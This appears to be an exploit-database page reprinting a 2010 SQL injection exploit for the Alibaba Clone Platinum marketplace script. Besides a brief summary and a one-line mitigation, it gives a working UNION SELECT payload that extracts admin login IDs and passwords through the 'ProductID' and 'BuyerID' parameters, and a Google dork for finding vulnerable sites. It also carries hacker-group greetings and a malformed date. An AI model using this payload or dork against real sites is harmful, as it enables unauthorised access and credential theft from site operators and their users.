header-logo
Suggest Exploit
vendor:
Alibaba Clone Platinum
by:
GuN
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Alibaba Clone Platinum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability

A vulnerability exists in Alibaba Clone Platinum, where an attacker can inject malicious SQL queries into the 'ProductID' and 'BuyerID' parameters of the 'buyer/index.php' page. This can be exploited to disclose the admin credentials by using the UNION SELECT statement.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability 
# Author: GuN
# Published: 2010-14-05 
# Verified: yes 


........../¯¯/).................(\¯¯\..........
........./¯.//....................\\.¯\.........
......../..//.........GuN........\\..\........
../´¯`/'

 /´`\...WJA-TEAM../´`\ '\`´¯\...
./

 '/ / / /¨/¯\................./¯\¨\ \ \ \' \.
(
 '( ´ ´ ¯\/'' )................( ''/\¯ ` ` )' )




-----------------------------------------------------------------------
  Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : GuN
Location    : Tunisia - Tunis - Lycée el Omrane
Time Zone   : GMT +1:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : Alibaba Clone Platinum
Vendor      : http://www.alibabaclone.com/
Price       : $699 USD
Google Dork : allinurl:buyer/index.php?ProductID=
Overview    :B2B
 trading Marketplace Script clone of alibaba 
Marketplace script is a 
wonderful solution to launch your own business to 
business and b2c site. 
Script is packed with lot of features to provide a 
very sound foundation 
to your trading portal site.

  

Exploit:
~~~~~~~
-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--

  

  SQLi GuN:
  ~~~~~~~
   
  http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID=

  

GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis 
<3 Inter  <==> Volc4n0 <==> Vbspiders.com

  

  Contact:

XGuN@Hacker.Ps

  ~~~~

  XGuN@ViP.Cn

  ~~~~

Navigation

Suggest Exploit

Services By CQR